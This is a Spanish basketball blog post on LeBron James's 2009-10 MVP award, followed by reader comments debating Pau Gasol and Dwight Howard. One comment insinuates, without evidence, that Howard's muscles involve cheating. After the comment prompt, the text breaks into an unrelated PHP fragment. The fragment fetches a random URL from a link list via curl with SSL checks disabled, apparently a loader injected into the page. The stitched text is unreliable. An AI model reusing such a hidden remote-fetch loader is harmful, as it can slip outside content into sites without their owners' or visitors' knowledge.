Lebron James logra su segundo MVP consecutivo

03 de May de 2010 por txusma

Finalmente se confirma lo que era un secreto a voces desde hace varios días y es que Lebron James se ha alzado con el trofeo Maurice Podoloff al mejor jugador de la temporada 2009-2010. “King” James ha conseguido lo que parecía imposible, mejorar su temporada anterior, promediando unos espectaculares 29.7 puntos, 8.6 asistencias, 7.3 rebotes, 1.6 robos y 1 tapón. Aconsejamos releer de nuevo los números para que no pasen desapercibidos porque con Lebron no hemos acostumbrado demasiado a actuaciones sobrenaturales. Además ha liderado a los Cavs al primer puesto de la liga regular. Sin duda, un premio indiscutible. La pregunta ahora es ¿cuántos MVP ganará Lebron a lo largo de su carrera?

El MVP se decide a partir de los votos de una serie de periodistas que dan 5, 4, 3, 2 y 1 punto a sus 5 candidatos. Pues bien, Lebron ha conseguido 116 votos en primera posición de un total de 122. Muy lejos ha quedado en segunda posición Kevin Durant con Kobe Bryant completando el podio. Dwight Howard completaría el grupo de perseguidores de Lebron James en la cuarta posición. Ya más lejos aparecen Dwyane Wade, Carmelo Anthony o Dirk Nowitzki. Jugadores como Manu Ginobili, Stephen Jackson, Joe Johnson o Chauncey Billups también han conseguido algún voto.

Como apuntaba Kantonyo en un comentario, y no es por ser chauvinistas, considero vergonzosa la ausencia de Pau Gasol en las votaciones. Evidentemente, nadie apostaría por él como MVP de la temporada pero creo que todos estaremos de acuerdo si digo que se merecía más votos que varios de los jugadores que sí aparecen en las listas. El sueño de verlo en el primer o segundo quinteto parece quedar truncado. Como curiosidad Tim Duncan tampoco ha recibido ningún voto…

Comenta

10 comentarios a esta entrada

  1. Rompe dice:
    #1

    Igual sería conveniente cambiar la foto… xD

    Merecidísimo MVP, poco más se puede decir…

      Citar

  2. pcerezo dice:
    #2

    Estoy seguro que Phil Jackson habrá revisado las votaciones con su sonrisa irónica en la boca. No le habéis votado pero juega en mi equipo.
    Dudo ahora mismo que haya un solo entrenador en la NBA que prefiera a Stoudamire o Nowitzki por delante de Gasol.

    Lo que si me ha gustado es el segundo puesto de Durant. Vamos a ver una lucha fratricida entre este y Lebron los próximos años, porque estoy seguro de que OKC van a mejorar sus balances de victorias y eso va a ser fundamental.

    Un saludo,
    Pablo

      Citar

  3. Txusma dice:
    #3

    Cambiada!

      Citar

  4. kantonyo dice:
    #4

    vaya, me he quedado con las ganas de saber que foto habiais puesto….

    Lo de Gasol, pues eso, que tiene que hacer este chico para ser considerado uno de los grandes?? 40 puntos, 20 rebotes?

    1ª Ronda contra Thunder:

    Pau Gasol: 18 puntos (53 % – 41/77), 12 rebotes, 4 asi, 26 Eff
    Kobe Bryant: 23 puntos (41% – 49-120), 4 rebotes, 4 asi, 16 Eff

    Quien ha sido más determinante en la eliminatoria???

    Regular Season:

    Pau Gasol: 18,3 puntos (53 %), 11,3 rebotes, 3,4 asi, 25,9 Eff
    Kobe Bryant: 27 puntos (45%), 5,4 rebotes, 5 asi, 22,9 Eff

    Tan poco influyente ha sido Pau Gasol en el tercer mejor equipo del año???

    Pau Gasol es millones de veces mejor que Dwight Howard, ya lo ha demostró en las finales del año pasado. Este año incluso ha tenido mejores numeros que el de Orlando. Parece que esto no sirve de nada.

    Por cierto, considerando a Howard el mejor pívot no se merece esos puntos esta temporada ni de coña.

      Citar

  5. TheDeerHunter dice:
    #5

    En este premio Pau sale perdiendo porque no es el teórico líder del equipo. No es la primera espada a los efectos y eso es lo que se valora en el premio.

    Yo no lo sé… me considero Gasolista declarado. Supongo que votaría a LeBron, Kobe, Wade, Durant seguros… y quizás a Howard, Deron Williams, Nowitzki o Duncan. Aún creyendo que la temporada de Gasol ha sido superior en muchos aspectos a la de alguno de ellos. Dudo mucho que llegara a votar alguna vez a dos jugadores del mismo equipo. No creo que vaya con el espíritu del premio.

    Eso sí… lo de los votos a Ginobili, Stephen Jackson, Joe Johnson… pues no me lo explico tanto.

    Supongo que es un detalle menor… el premio a LeBron es justo y eso es lo que importa. Se sigue cumpliendo la máxima de “todos los que lo ganaron lo merecieron y alguno que no lo ganó también lo mereció”

    Otra cosa es que si ahora mismo concedieran el MVP de los playoffs y se lo fueran a dar a un Laker, para mí no debería de haber color. Seguro a Pau.

      Citar

  6. Love Denise dice:
    #6

    lo de que Gasol es millones de veces mejor que Howard, es una broma??? supongo que será una manera de hablar, hay gente que utiliza una forma de hablar exagerada,o no me lo explico.
    Partiendo de la base de que los 2 son muy buenos, se me antoja dificil compararlo y mucho menos atreverme a decir que uno es millones de veces mejor que otro. salvando las distancias, lo veo cómo decir “quién es mejor? Shaq o Duncan, lebron vs Kobe,”…
    Está claro que Gasol tiene más calidad y recursos en ataque, pero Howard es una bestia defensiva y a pesar de sus pocos recursos y tiros libres fallados, te puede meter 20 ptos con relativa facilidad a base de balones colgados que machaca y rebotes ofensivos. si este tipo mejora sus movimientos, será imparable, además, los intangibles que aporta no son pocos. Howard tiene mucho que ver en la facilidad con la que tiran los triplistas de Orlando, no lo compares simplemente por números estadísticos y/o partidos entre ellos, ., este año, en muchas ocasiones, Howard ha estado bastante olvidado por Van Gundy y apenas ha lanzado

      Citar

  7. kantonyo dice:
    #7

    Love, viste la final del año pasado? Pues ahi se demostro esa clara superioridad. Digo millones, para plasmar de una forma exagerar esa diferencia. Creo que en nada es mejor Howard que Gasol, ni siquiera defensivamente. Howard comparado con Gasol pierde en todas las facetas. En recursos ofensivos, en recursos defensivos, en tiro, en visión de juego, en manejo del balón, en presencia en la pista, en caracter, en títulos … En lo único que gana Howard es en musculos, y no me extrañaría nada que esos musculos tuvieran trampa.

      Citar

  8. kantonyo dice:
    #8

    Pues si Van Gundy se ha olvidado de Howard, no entiendo para nada que sea elegido en cuarta posición con tantos votos, cuando gente como Gasol ha jugado casi 40 minutos por partido, siendo referente en un equipo campeón y con mejor balance en el oeste. Está claro que a alguien se le perdonan sus malos rendimientos y ser secundario en un equipo, y a otros no se le perdonan ni una.

      Citar

  9. kantonyo dice:
    #9

    Y otra cosa, y no quiero ser pesado. Dices que Howard si mejora en esto si mejora en lo otro… pues claro si mejora sera mejor que Gasol, pero es que este premio es de ahora, y Gasol no tiene que mejorar en nada para merecerse estar entre los 10 mejores como mínimo de la liga, y como yo considero en el quinteto títular.

    DERON-LEBRON-DURANT-GASOL-HOWARD

    Y pongo a Howard, porque como he dicho otras veces, le considero el mejor pívot de la liga, pero no es mejor que Gasol.

      Citar

  10. Love Denise dice:
    #10

    Ah puedo entender que pienses que es mejor, lo que no entendía era lo de millones de veces, tampoco creo que sea para tanto. Yo si pienso que en defensa sí es mejor Howard, tanto en defensa hombre-hombre como en defensa a las ayudas, sin menospreciar el trabajo defensivo de Pau.
    Si los musculos de Howard son por trampa, entonces no es el único tramposo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>